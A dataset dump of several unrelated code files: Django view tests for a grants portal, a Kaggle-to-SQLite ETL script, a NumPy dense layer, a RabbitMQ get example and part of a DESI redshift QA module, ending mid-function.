models.PersonIdentifierType.create(\n code=\"11\", description=\"Identifier #11\", definition=\"Identifier #11 definition\"\n )\n resp = client.get(\"/profile/external-ids/\")\n assert not models.ProfilePersonIdentifier.where(profile=p).exists()\n # resp = client.post(\n # \"/profile/external-ids/\",\n # {\n # \"form-TOTAL_FORMS\": 1,\n # \"form-INITIAL_FORMS\": 0,\n # \"form-0-profile\": p.id,\n # \"form-0-code\": 11,\n # \"form-0-value\": \"CODE 11\",\n # \"form-0-id\": \"\",\n # \"save\": \"Save\",\n # },\n # follow=True,\n # )\n # assert models.ProfilePersonIdentifier.where(profile=p).exists()\n\n resp = client.post(\n \"/profile/cvs/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-id\": \"\",\n \"form-0-profile\": p.id,\n \"form-0-owner\": admin_user.id,\n \"form-0-title\": \"TEST\",\n \"form-0-file\": BytesIO(b\"TEST\"),\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert resp.status_code == 200\n\n # Accademic records:\n models.FieldOfStudy.create(\n code=\"180101\",\n description=\"test\",\n four_digit_code=\"1010\",\n four_digit_description=\"test\",\n two_digit_code=\"11\",\n two_digit_description=\"test #11\",\n definition=\"test definition\",\n )\n resp = client.get(\"/profile/academic-records/\")\n assert not models.AcademicRecord.where(profile=p).exists()\n resp = client.post(\n \"/profile/academic-records/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-start_year\": 2020,\n \"form-0-qualification\": 9,\n \"form-0-conferred_on\": \"2020-05-02\",\n \"form-0-discipline\": \"180101\",\n \"form-0-awarded_by\": org.id,\n \"form-0-research_topic\": \"TOPIC\",\n \"form-0-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n # assert models.AcademicRecord.where(profile=p).exists()\n\n # Recognitions:\n a = models.Award.create(name=\"AWARD\")\n resp = client.get(\"/profile/recognitions/\")\n assert not models.Recognition.where(profile=p).exists()\n resp = client.post(\n \"/profile/recognitions/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-recognized_in\": 2020,\n \"form-0-award\": a.id,\n \"form-0-awarded_by\": org.id,\n \"form-0-amount\": \"9999.99\",\n \"form-0-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert models.Recognition.where(profile=p).exists()\n\n # Comleted project\n resp = client.get(f\"/profiles/{user.pk}\")\n\n assert b\"Female\" in resp.content\n assert b\"Latvian\" in resp.content\n\n\ndef test_sentry(client, admin_user):\n\n client.post(\"/accounts/logout/\")\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug/\")\n assert \"FAILURE\" in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug/TEST\")\n assert \"TEST\" in str(excinfo.value)\n\n client.force_login(admin_user)\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug-login/\")\n assert \"FAILURE\" in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug-login/TEST123ABC\")\n assert \"TEST123ABC\" in str(excinfo.value)\n\n\ndef test_subscription(client):\n\n resp = client.get(\"/\", follow=True)\n assert b\"Sign up for our newsletter\" in resp.content\n\n assert not Subscription.objects.filter(email=\"test@test.com\", name=\"Tester Testeron\").exists()\n resp = client.post(\n \"/subscribe/\", dict(email=\"test@test.com\", name=\"Tester Testeron\"), follow=True\n )\n assert b\"Verify Your E-mail Address\" in resp.content\n assert Subscription.objects.filter(email=\"test@test.com\", name=\"Tester Testeron\").exists()\n\n resp = client.post(\"/subscribe/\", dict(email=\"test123@test.com\"))\n assert str(Subscription.objects.filter(email=\"test123@test.com\").first()) == \"test123@test.com\"\n\n resp = client.post(\"/subscribe/\", dict(email=\"test42@test.com\", name=\"Tester\"))\n assert str(Subscription.objects.filter(email=\"test42@test.com\").first()) == \"Tester\"\n\n\ndef test_application(client, django_user_model):\n\n r = models.Round.get(title=\"Science Communication Prize 2021\")\n u = django_user_model.objects.create(\n first_name=\"FN123\",\n last_name=\"LN123\",\n username=\"test123\",\n password=\"p455w0rd\",\n email=\"test123@test.com\",\n )\n client.force_login(u)\n Profile.create(user=u)\n org = models.Organisation.create(name=\"ORG\")\n\n resp = client.get(f\"/applications/{r.pk}/~create\")\n assert resp.status_code == 200\n assert b\"FN123\" in resp.content\n assert b\"LN123\" in resp.content\n assert b\"test123@test.com\" in resp.content\n\n resp = client.post(\n f\"/applications/{r.pk}/~create\",\n dict(\n title=\"MR\",\n first_name=u.first_name,\n last_name=u.last_name,\n org=org.id,\n position=\"POS\",\n postal_address=\"123 Test Street\",\n city=\"Auckland\",\n postcode=\"1010\",\n daytime_phone=\"0221221442\",\n mobile_phone=\"0221221442\",\n email=u.email,\n ),\n follow=True,\n )\n\n assert models.Application.where(email=u.email).exists()\n\n\ndef test_org_autocompleting(client, user):\n\n models.Organisation.create(name=\"ORG\")\n resp = client.get(\"/autocomplete/org/?q=OR\", follow=True)\n assert b\"Sign in\" in resp.content\n\n client.force_login(user)\n resp = client.get(\"/autocomplete/org/\")\n assert resp.status_code == 200\n assert b\"ORG\" in resp.content\n\n resp = client.get(\"/autocomplete/org/?q=OR\")\n assert resp.status_code == 200\n assert b\"ORG\" in resp.content\n\n # if query is not given select last\n for i in range(1, 20):\n models.Organisation.create(name=f\"ABC #{i}\")\n\n resp = client.get(\"/autocomplete/org/\")\n assert resp.status_code == 200\n assert b\"ORG\" not in resp.content\n\n\ndef test_award_autocompleting(client, user):\n\n models.Award.create(name=\"AWARD\")\n resp = client.get(\"/autocomplete/award/?q=AW\", follow=True)\n assert b\"Sign in\" in resp.content\n\n client.force_login(user)\n resp = client.get(\"/autocomplete/award/\")\n assert resp.status_code == 200\n assert b\"AWARD\" in resp.content\n\n resp = client.get(\"/autocomplete/award/?q=AW\", follow=True)\n assert resp.status_code == 200\n assert b\"AWARD\" in resp.content\n\n # if query is not given select last\n for i in range(1, 20):\n models.Award.create(name=f\"ABC #{i}\")\n\n resp = client.get(\"/autocomplete/award/\")\n assert resp.status_code == 200\n assert b\"AWARD\" not in resp.content\n\n\ndef test_invitation(client, admin_user):\n\n client.force_login(admin_user)\n org = models.Organisation.create(name=\"ORG\")\n\n resp = client.get(\"/invitations/~create\")\n assert resp.status_code == 200\n email = \"test@test.net\"\n\n resp = client.post(\n \"/invitations/~create\",\n dict(email=email, first_name=\"FN\", last_name=\"LN\"),\n follow=True,\n )\n assert resp.status_code == 200\n assert (f\"An invitation was sent to {email}\").encode() in resp.content\n\n assert models.Invitation.where(email=email).exists()\n\n resp = client.post(\n \"/invitations/~create\",\n dict(email=email, first_name=\"FN\", last_name=\"LN\", org=org.id),\n follow=True,\n )\n assert resp.status_code == 200\n assert (f\"An invitation was sent to {email}\").encode() in resp.content\n assert models.Invitation.where(org=org).exists()\n\n\ndef test_cv(client, admin_user):\n\n resp = client.get(\"/profile/cvs/\")\n assert resp.status_code == 302\n\n client.force_login(admin_user)\n\n resp = client.post(\n \"/profile/cvs/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-id\": \"\",\n \"form-0-title\": \"TEST\",\n \"form-0-file\": BytesIO(b\"TEST\"),\n \"save\": \"Save\",\n },\n follow=True,\n )\n assert b\"Please complete your profile\" in resp.content\n\n profile = models.Profile.create(user=admin_user, is_completed=True)\n\n resp = client.get(\"/profile/cvs/\")\n\n resp = client.post(\n \"/profile/cvs/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-id\": \"\",\n \"form-0-profile\": profile.id,\n \"form-0-owner\": admin_user.id,\n \"form-0-title\": \"TEST\",\n \"form-0-file\": BytesIO(b\"TEST\"),\n \"save\": \"Save\",\n },\n follow=True,\n )\n\n assert resp.status_code == 200\n assert models.CurriculumVitae.where(owner=admin_user, profile=profile).exists()\n","repo_name":"nad2000/RSTA-apportal-hub","sub_path":"portal/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":16727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9740778754","text":"#import needed packages\nimport os\nimport pandas as pd\nimport zipfile as zp\nimport sqlite3 as sql3\nfrom dotenv import dotenv_values\nfrom IPython.display import display\n\n#importing our secrets from environment varibales\nconfig = dotenv_values(\".env\")\nos.environ['KAGGLE_USERNAME'] = config.get('KAGGLE_USERNAME')\nos.environ['KAGGLE_KEY'] = config.get('KAGGLE_KEY')\n\n#connecting to kaggle via api\nfrom kaggle.api.kaggle_api_extended import KaggleApi\nkgl_api = KaggleApi()\nkgl_api.authenticate()\n\n#here we declare where our paths is for (main data folder, kaggle dataset, extraction path)\ndata_path = '../data' #main data path\nsqlite_path = '../db' #main db path\nkaggle_dataset = 'majedalhulayel/sakani-projects-saudi-arabia' #kaggle dataset path\n\n#lets get the data\nkgl_api.dataset_download_files(kaggle_dataset, data_path)\n\n#unzip the dataset file and save to new dir\ntry:\n if os.path.exists(data_path): #if the data folder do exists enter here\n with zp.ZipFile(data_path+'/sakani-projects-saudi-arabia.zip') as data: #take from original path\n data.extractall(data_path) #uzip into the path if exists\n print(f\"Done extracting all files to: {data_path}\") #message\n \n else: #if the data folder doesn't exists enter here\n print(f'Creating new data folder: {data_path}\\n') #message\n os.mkdir(data_path) #create new folder if not exists\n with zp.ZipFile(data_path+'/sakani-projects-saudi-arabia.zip') as data: #take from original path\n data.extractall(data_path) #unzip into the new path\n print(f\"Done extracting all files to: {data_path}\") #message\nexcept Exception as e:\n print(f\"Invalid file \\n{e}\")\n\n#lets play with the dataset\ndf = pd.read_csv(\"../data/Sakani Projects.csv\")\n\n#rename some columns to more clean naming\ndf.rename(columns = {'under_construction_status':'construction_status','unit_types_0':'unit_type',\\\n 'available_units_for_auctions_count':'available_auctions_units','available_units_count':'available_units'}, inplace=True)\n\n#clean row-level data\ndf['developer_name'].fillna('لا يوجد مدخل', inplace=True)\ndf['publish_date'].ffill(inplace=True) #filling nan values with prev value\ndf['construction_status'].fillna('no entry', inplace=True)\ndf['location'] = df['location_lat'].astype(str) +','+ df['location_lon'].astype(str) #create new column to handle the lat,lot location\n\n#un_wanted columns to delete\ndf.drop(['city_id','region_id','region_key','region_order_sequence','city_order_sequence','group_unit_id','promoted','unit_types_1', \\\n 'unit_types_2','type','resource_id','resource_type','subsidizable','max_street_width','max_unit_age','max_bathroom','driver_room', \\\n 'elevator','basement','delegated_by_broker','maid_room','min_bathroom','min_street_width','min_unit_age','pool','publish','use_register_interest_flag', \\\n 'location_lat', 'location_lon'], axis=1, inplace=True)\n\n#lets see the dataset after cleaning and before loading it to the DWH\ndisplay(df.head()) #here we see the dataset in style of dataframe\nprint(f\"Dataset rows/columns: {df.shape}\") #here we see the dataset shape after cleaning\n\n#lets save the new data to another file\nprint(f\"Saving the new data to another file: {data_path}/cleaned_data.csv\")\ndf.to_csv(data_path+'/cleaned_data.csv', index=False)\n\n#lets load our cleand data into sqlite table\ntry:\n if os.path.exists(sqlite_path): #if the data folder do exists enter here\n engine = sql3.connect(config.get('SQLITE_DB'))\n df.to_sql(config.get('SQLITE_TABLE'), engine, index=False)\n print(f\"Loading data into sqlite3 database ...!\")\n\n else: #if the data folder doesn't exists enter here\n print(f'Creating new db folder: {sqlite_path}\\n') #message\n os.mkdir(sqlite_path) #create new folder if not exists\n engine = sql3.connect(config.get('SQLITE_DB'))\n df.to_sql(config.get('SQLITE_TABLE'), engine, index=False)\n print(f\"Loading data into sqlite3 database ...!\")\nexcept Exception as e:\n print(f\"Invalid db ... \\n{e}\")\n","repo_name":"iimrx/sakani_analysis","sub_path":"code/sakani_etl.py","file_name":"sakani_etl.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27052139338","text":"\nimport numpy as np\nfrom lib.layers.layer import Layer\n\nclass Dense(Layer):\n\n def __init__(self, n_inputs, n_neurons, activation_function = None) -> None:\n self.weights = np.random.randn(n_inputs, n_neurons) * 0.1\n self.biases = np.zeros((1, n_neurons)) # Bias Vector using 0\n self.activation_function = activation_function\n\n def forward(self, inputs):\n self.inputs = inputs\n if len(self.inputs.shape) == 1:\n self.inputs = np.array([self.inputs])\n self.output = np.dot(self.inputs, self.weights) + self.biases\n if self.activation_function:\n self.output = self.activation_function(self.output)\n return self.output\n \n def backward(self, output_error, learning_rate = 0.2):\n self.dvalues = output_error\n input_error = np.dot(output_error, self.weights.T)\n weights_error = np.dot(self.inputs.T, output_error)\n\n self.weights -= learning_rate * weights_error\n self.biases -= learning_rate * output_error\n return input_error","repo_name":"CarlosCalgaro/Neural-Network","sub_path":"lib/layers/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1169118053","text":"#!/usr/bin/env python\n\n# Import the RabbitMQ Client Library\nimport rabbitpy\n\nurl = 'amqp://guest:guest@localhost:5672/%2F'\n\nconnection = rabbitpy.Connection(url)\n\nchannel = connection.channel()\n\nqueue = rabbitpy.Queue(channel, 'example')\n\n# while there are messages in the queue, fetch them using Basic.Get\nwhile len(queue) > 0:\n message = queue.get()\n print('Message:')\n print(' ID: %s' % message.properties['message_id'])\n print(' Time: %s' % message.properties['timestamp'].isoformat())\n print(' Body: %s' % message.body)\n message.ack()\n","repo_name":"dhyana1984/rabbit-in-depth","sub_path":"ch2/basic-get-example.py","file_name":"basic-get-example.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37686995071","text":"\"\"\"\ndesisim.spec_qa.redshifts\n=========================\n\nModule to run high_level QA on a given DESI run\n\nWritten by JXP on 3 Sep 2015\n\"\"\"\nfrom __future__ import print_function, absolute_import, division\n\nimport matplotlib\n# matplotlib.use('Agg')\n\nimport numpy as np\nimport sys, os, pdb, glob\n\nfrom matplotlib import pyplot as plt\nimport matplotlib.gridspec as gridspec\n\nfrom astropy.io import fits\nfrom astropy.table import Table, vstack, hstack, MaskedColumn, join\n\nfrom .utils import elg_flux_lim, get_sty_otype, catastrophic_dv, match_otype\n\nfrom desiutil.log import get_logger, DEBUG\n\n\ndef calc_dz(simz_tab):\n '''Calcualte deltaz/(1+z) for a given simz_tab\n '''\n dz = (simz_tab['Z']-simz_tab['TRUEZ'])/(1+simz_tab['TRUEZ'])\n #\n return dz\n\n\ndef calc_dzsig(simz_tab):\n '''Calcualte deltaz/sig(z) for a given simz_tab\n '''\n dzsig = (simz_tab['Z']-simz_tab['TRUEZ'])/simz_tab['ZERR']\n #\n return dzsig\n\n\ndef calc_stats(simz_tab, objtype, flux_lim=True):\n \"\"\"Calculate redshift statistics for a given objtype\n\n Parameters\n ----------\n simz_tab : Table\n This parameter is not documented.\n objtype : str\n Object type, e.g. 'ELG', 'LRG'\n flux_lim : bool, optional\n Impose the flux limit for ELGs? [True]\n \"\"\"\n # Cut on targets that were analyzed by RedMonster\n\n # Init\n stat_dict = {} #dict(OBJTYPE=objtype)\n\n # N targets\n obj_tab = slice_simz(simz_tab, objtype=objtype)\n stat_dict['NTARG'] = len(obj_tab)\n\n # Number of objects with RedMonster\n zobj_tab = slice_simz(simz_tab,objtype=objtype,redm=True)\n stat_dict['N_RM'] = len(zobj_tab)\n\n\n # Redshift measured (includes catastrophics)\n # For ELGs, cut on OII_Flux too\n survey_tab = slice_simz(simz_tab,objtype=objtype,survey=True)\n stat_dict['N_SURVEY'] = len(survey_tab)\n\n # Catastrophic failures\n cat_tab = slice_simz(simz_tab,objtype=objtype,\n survey=True,catastrophic=True)\n stat_dict['NCAT'] = len(cat_tab)\n if stat_dict['N_SURVEY'] > 0:\n stat_dict['CAT_RATE'] = len(cat_tab)/stat_dict['N_SURVEY']\n else:\n stat_dict['CAT_RATE'] = 0\n\n # Good redshifts\n gdz_tab = slice_simz(simz_tab,objtype=objtype,\n survey=True,good=True)\n stat_dict['N_GDZ'] = len(gdz_tab)\n\n # Redshift with ZWARN=0\n zwarn0_tab = slice_simz(simz_tab,objtype=objtype,\n survey=True,all_zwarn0=True,good=True)\n stat_dict['N_ZWARN0'] = len(zwarn0_tab)\n\n # Efficiency\n if stat_dict['N_SURVEY'] > 0:\n stat_dict['EFF'] = float(len(gdz_tab))/float(stat_dict['N_SURVEY'])\n else:\n stat_dict['EFF'] = 1.\n\n # Purity\n if stat_dict['N_ZWARN0'] > 0:\n stat_dict['PURITY'] = float(len(gdz_tab))/float(stat_dict['N_ZWARN0'])\n else:\n stat_dict['PURITY'] = 1.\n\n # delta z\n dz = calc_dz(gdz_tab)\n if len(dz) == 0:\n dz = np.zeros(1)\n not_nan = np.isfinite(dz)\n stat_dict['MEAN_DZ'] = float(np.mean(dz[not_nan]))\n stat_dict['MEDIAN_DZ'] = float(np.median(dz[not_nan]))\n stat_dict['RMS_DZ'] = float(np.std(dz[not_nan]))\n\n # Return\n return stat_dict\n\n\ndef load_z(fibermap_files, zbest_files, outfil=None):\n '''Load input and output redshift values for a set of exposures\n\n Parameters\n ----------\n fibermap_files: list\n List of fibermap files\n zbest_files: list\n List of zbest output files from Redmonster\n outfil: str, optional\n Output file for the table\n\n Returns\n -------\n Table\n Table of target info including Redmonster redshifts\n '''\n # imports\n log = get_logger()\n\n # Init\n\n # Load up fibermap and simspec tables\n fbm_tabs = []\n sps_tabs = []\n for fibermap_file in fibermap_files:\n fbm_hdu = fits.open(fibermap_file)\n\n # skip calibration exposures\n flavor = fbm_hdu[1].header['FLAVOR']\n fbm_hdu.close()\n if flavor in ('arc', 'flat', 'bias'):\n continue\n\n log.info('Reading: {:s}'.format(fibermap_file))\n # Load simspec (for fibermap too!)\n simspec_file = fibermap_file.replace('fibermap','simspec')\n sps_hdu = fits.open(simspec_file)\n # Make Tables\n fbm_tabs.append(Table(sps_hdu['FIBERMAP'].data,masked=True))\n sps_tabs.append(Table(sps_hdu['TRUTH'].data,masked=True))\n sps_hdu.close()\n\n # Stack\n fbm_tab = vstack(fbm_tabs)\n sps_tab = vstack(sps_tabs)\n del fbm_tabs, sps_tabs\n\n # Add the version number header keywords from fibermap_files[0]\n hdr = fits.getheader(fibermap_files[0].replace('fibermap', 'simspec'))\n for key, value in sorted(hdr.items()):\n if key.startswith('DEPNAM') or key.startswith('DEPVER'):\n fbm_tab.meta[key] = value\n\n # Drop to unique\n univ, uni_idx = np.unique(np.array(fbm_tab['TARGETID']),return_index=True)\n fbm_tab = fbm_tab[uni_idx]\n sps_tab = sps_tab[uni_idx]\n\n # Combine + Sort\n sps_tab.remove_column('TARGETID') # It occurs in both tables\n sps_tab.remove_column('MAG') # It occurs in both tables\n simz_tab = hstack([fbm_tab,sps_tab],join_type='exact')\n simz_tab.sort('TARGETID')\n nsim = len(simz_tab)\n\n # Cleanup some names\n #simz_tab.rename_column('OBJTYPE_1', 'OBJTYPE')\n #simz_tab.rename_column('OBJTYPE_2', 'TRUETYPE')\n\n # Rename QSO\n qsol = np.where( match_otype(simz_tab, 'QSO') &\n (simz_tab['TRUEZ'] >= 2.1))[0]\n simz_tab['TEMPLATETYPE'][qsol] = 'QSO_L'\n qsot = np.where( match_otype(simz_tab, 'QSO') &\n (simz_tab['TRUEZ'] < 2.1))[0]\n simz_tab['TEMPLATETYPE'][qsot] = 'QSO_T'\n\n # Load up zbest files\n zb_tabs = []\n for zbest_file in zbest_files:\n try:\n zb_hdu = fits.open(zbest_file)\n except FileNotFoundError:\n log.info(\"ZBEST FILE NOT FOUND. I HOPE YOU ARE ONLY TESTING\")\n else:\n zb_tabs.append(Table(zb_hdu[1].data))\n\n # Stack\n zb_tab = vstack(zb_tabs)\n univ, uni_idx = np.unique(np.array(zb_tab['TARGETID']),return_index=True)\n zb_tab = zb_tab[uni_idx]\n\n # Match up\n sim_id = np.array(simz_tab['TARGETID'])\n z_id = np.array(zb_tab['TARGETID'])\n inz = np.in1d(z_id,sim_id,assume_unique=True)\n ins = np.in1d(sim_id,z_id,assume_unique=True)\n\n z_idx = np.arange(z_id.shape[0])[inz]\n sim_idx = np.arange(sim_id.shape[0])[ins]\n assert np.array_equal(sim_id[sim_idx],z_id[z_idx])\n\n # Fill up\n ztags = ['Z','ZERR','ZWARN','SPECTYPE']\n new_clms = []\n mask = np.array([True]*nsim)\n mask[sim_idx] = False\n for kk,ztag in enumerate(ztags):\n # Generate a MaskedColumn\n new_clm = MaskedColumn([zb_tab[ztag][z_idx[0]]]*nsim, name=ztag, mask=mask)\n #name=new_tags[kk], mask=mask)\n # Fill\n new_clm[sim_idx] = zb_tab[ztag][z_idx]\n # Append\n new_clms.append(new_clm)\n # Add columns\n\n simz_tab.add_columns(new_clms)\n\n # Write?\n if outfil is not None:\n simz_tab.write(outfil,overwrite=True)\n # Return\n return simz_tab # Masked Table\n\n\ndef obj_requirements(zstats, objtype):\n \"\"\"Assess where a given objtype passes the requirements\n Requirements from Doc 318 (August 2014)\n\n Parameters\n ----------\n zstats : Object\n This parameter is not documented.\n objtype : str\n Object type, e.g. 'ELG', 'LRG'\n\n Returns\n -------\n dict\n Pass/fail dict\n \"\"\"\n log = get_logger()\n pf_dict = {}\n #\n all_dict=dict(ELG={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.90},\n LRG={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.95},\n BGS={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.95},\n MWS={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.95},\n QSO_T={'RMS_DZ':0.0025, 'MEAN_DZ': 0.0004, 'CAT_RATE': 0.05, 'EFF': 0.90},\n QSO_L={'RMS_DZ':0.0025, 'CAT_RATE': 0.02, 'EFF': 0.90})\n req_dict = all_dict[objtype]\n\n tst_fail = ''\n passf = str('PASS')\n for key in req_dict:\n ipassf = str('PASS')\n if key in ['EFF']: # Greater than requirement\n if zstats[key] < req_dict[key]:\n ipassf = str('FAIL')\n tst_fail = tst_fail+key+'-'\n log.warning('{:s} failed requirement {:s}: {} < {}'.format(objtype, key, zstats[key], req_dict[key]))\n else:\n log.debug('{:s} passed requirement {:s}: {} >= {}'.format(objtype, key, zstats[key], req_dict[key]))\n else:\n if zstats[key] > req_dict[key]:\n ipassf = str('FAIL')\n tst_fail = tst_fail+key+'-'\n log.warning('{:s} failed requirement {:s}: {} > {}'.format(objtype, key, zstats[key], req_dict[key]))\n else:\n log.debug('{:s} passed requirement {:s}: {} <= {}'.format(objtype, key, zstats[key], req_dict[key]))\n # Update\n pf_dict[key] = ipassf\n if ipassf == str('FAIL'):\n passf = str('FAIL')\n if passf == str('FAIL'):\n tst_fail = tst_fail[:-1]\n # log.warning('OBJ={:s} failed tests {:s}'.format(objtype,tst_fail))\n #\n #pf_dict['FINAL'] = passf\n return pf_dict, passf\n\n\ndef slice_simz(simz_tab, objtype=None, redm=False, survey=False,\n catastrophic=False, good=False, all_zwarn0=False):\n '''Slice input simz_tab in one of many ways\n\n Parameters\n ----------\n redm : bool, optional\n RedMonster analysis required?\n all_zwarn0 : bool, optional\n Ignores catastrophic failures in the slicing to return\n all sources with ZWARN==0\n survey : bool, optional\n Only include objects that satisfy the Survey requirements\n e.g. ELGs with sufficient OII_flux\n\n Returns\n -------\n simz_table : Table cut by input parameters\n '''\n # Init\n nrow = len(simz_tab)\n\n # Object type\n if objtype is None:\n objtype_mask = np.array([True]*nrow)\n else:\n objtype_mask = match_otype(simz_tab, objtype) # simz_tab['TEMPLATETYPE'] == objtype\n # RedMonster analysis\n if redm:\n redm_mask = simz_tab['Z'].mask == False # Not masked in Table\n else:\n redm_mask = np.array([True]*nrow)\n # Survey\n if survey:\n survey_mask = (simz_tab['Z'].mask == False)\n # Flux limit\n elg = np.where(match_otype(simz_tab, 'ELG') & survey_mask)[0]\n elg_mask = elg_flux_lim(simz_tab['TRUEZ'][elg],\n simz_tab['OIIFLUX'][elg])\n # Update\n survey_mask[elg[~elg_mask]] = False\n else:\n survey_mask = np.array([True]*nrow)\n # Catastrophic/Good (This gets messy...)\n if (catastrophic or good):\n if catastrophic:\n catgd_mask = np.array([False]*nrow)\n else:\n catgd_mask = simz_tab['ZWARN']==0\n for obj in ['ELG','LRG','QSO_L','QSO_T']:\n dv = catastrophic_dv(obj) # km/s\n omask = np.where(match_otype(simz_tab, objtype) & (simz_tab['ZWARN']==0))[0]\n dz = calc_dz(simz_tab[omask]) # dz/1+z\n cat = np.where(np.abs(dz)*3e5 > dv)[0]\n # Update\n if catastrophic:\n catgd_mask[omask[cat]] = True\n else:\n if not all_zwarn0:\n catgd_mask[omask[cat]] = False\n else:\n catgd_mask = np.array([True]*nrow)\n\n # Final mask\n mask = objtype_mask & redm_mask & survey_mask & catgd_mask\n\n # Return\n return simz_tab[mask]\n\ndef obj_fig(simz_tab, objtype, summ_stats, outfile=None):\n \"\"\"Generate QA plot for a given object type\n \"\"\"\n from astropy.stats import sigma_clip\n logs = get_logger()\n gdz_tab = slice_simz(simz_tab,objtype=objtype, survey=True,good=True)\n if objtype == 'ELG':\n allgd_tab = slice_simz(simz_tab,objtype=objtype, survey=False,good=True)\n\n if len(gdz_tab) <= 1:\n logs.info(\"Not enough objects of type {:s} for QA\".format(objtype))\n return\n\n # Plot\n sty_otype = get_sty_otype()\n fig = plt.figure(figsize=(8, 6.0))\n gs = gridspec.GridSpec(2,2)\n # Title\n fig.suptitle('{:s}: Summary'.format(sty_otype[objtype]['lbl']),\n fontsize='large')\n\n # Offset\n for kk in range(4):\n yoff = 0.\n ax= plt.subplot(gs[kk])\n if kk == 0:\n yval = calc_dzsig(gdz_tab)\n ylbl = (r'$(z_{\\rm red}-z_{\\rm true}) / \\sigma(z)$')\n ylim = 5.\n # Stats with clipping\n clip_y = sigma_clip(yval, sigma=5.)\n rms = np.std(clip_y)\n redchi2 = np.sum(clip_y**2)/np.sum(~clip_y.mask)\n #\n xtxt = 0.05\n ytxt = 1.0\n for req_tst in ['EFF','CAT_RATE']:\n ytxt -= 0.12\n if summ_stats[objtype]['REQ_INDIV'][req_tst] == 'FAIL':\n tcolor='red'\n else:\n tcolor='green'\n ax.text(xtxt, ytxt, '{:s}: {:.3f}'.format(req_tst,\n summ_stats[objtype][req_tst]), color=tcolor,\n transform=ax.transAxes, ha='left', fontsize='small')\n # Additional\n ytxt -= 0.12\n ax.text(xtxt, ytxt, '{:s}: {:.3f}'.format('RMS:', rms),\n color='black', transform=ax.transAxes, ha='left', fontsize='small')\n ytxt -= 0.12\n ax.text(xtxt, ytxt, '{:s}: {:.3f}'.format(r'$\\chi^2_\\nu$:',\n redchi2), color='black', transform=ax.transAxes,\n ha='left', fontsize='small')\n else:\n yval = calc_dz(gdz_tab)\n if kk == 1:\n ylbl = (r'$(z_{\\rm red}-z_{\\rm true}) / (1+z)$')\n else:\n ylbl = r'$\\delta v_{\\rm red-true}$ [km/s]'\n ylim = max(5.*summ_stats[objtype]['RMS_DZ'],1e-5)\n if (np.median(summ_stats[objtype]['MEDIAN_DZ']) >\n summ_stats[objtype]['RMS_DZ']):\n yoff = summ_stats[objtype]['MEDIAN_DZ']\n\n if kk==1:\n # Stats\n xtxt = 0.05\n ytxt = 1.0\n dx = ((ylim/2.)//0.0001 +1)*0.0001\n ax.xaxis.set_major_locator(plt.MultipleLocator(dx))\n for stat in ['RMS_DZ','MEAN_DZ', 'MEDIAN_DZ']:\n ytxt -= 0.12\n try:\n pfail = summ_stats[objtype]['REQ_INDIV'][stat]\n except KeyError:\n tcolor='black'\n else:\n if pfail == 'FAIL':\n tcolor='red'\n else:\n tcolor='green'\n ax.text(xtxt, ytxt, '{:s}: {:.5f}'.format(stat,\n summ_stats[objtype][stat]), color=tcolor,\n transform=ax.transAxes, ha='left', fontsize='small')\n # Histogram\n if kk < 2:\n binsz = ylim/10.\n #i0, i1 = int( np.min(yval) / binsz) - 1, int( np.max(yval) / binsz) + 1\n i0, i1 = int(-ylim/binsz) - 1, int( ylim/ binsz) + 1\n rng = tuple( binsz*np.array([i0,i1]) )\n nbin = i1-i0\n # Histogram\n hist, edges = np.histogram(yval, range=rng, bins=nbin)\n xhist = (edges[1:] + edges[:-1])/2.\n #ax.hist(xhist, color='black', bins=edges, weights=hist)#, histtype='step')\n ax.hist(xhist, color=sty_otype[objtype]['color'], bins=edges, weights=hist)#, histtype='step')\n ax.set_xlabel(ylbl)\n ax.set_xlim(-ylim, ylim)\n\n else:\n if kk == 2:\n lbl = r'$z_{\\rm true}$'\n xval = gdz_tab['TRUEZ']\n xmin,xmax=np.min(xval),np.max(xval)\n dx = np.maximum(1,(xmax-xmin)//0.5)*0.1\n ax.xaxis.set_major_locator(plt.MultipleLocator(dx))\n #xmin,xmax=0.6,1.65\n elif kk == 3:\n if objtype == 'ELG':\n lbl = r'[OII] Flux ($10^{-16}$)'\n #xval = gdz_tab['OIIFLUX']*1e16\n xval = allgd_tab['OIIFLUX']*1e16\n yval = calc_dz(allgd_tab)\n # Avoid NAN\n gdy = np.isfinite(yval)\n xval = xval[gdy]\n yval = yval[gdy]\n xmin,xmax=0.5,20\n ax.set_xscale(\"log\", nonposy='clip')\n else:\n lbl = '{:s} (Mag)'.format(gdz_tab[0]['FILTER'][0])\n xval = gdz_tab['MAG'][:,0]\n 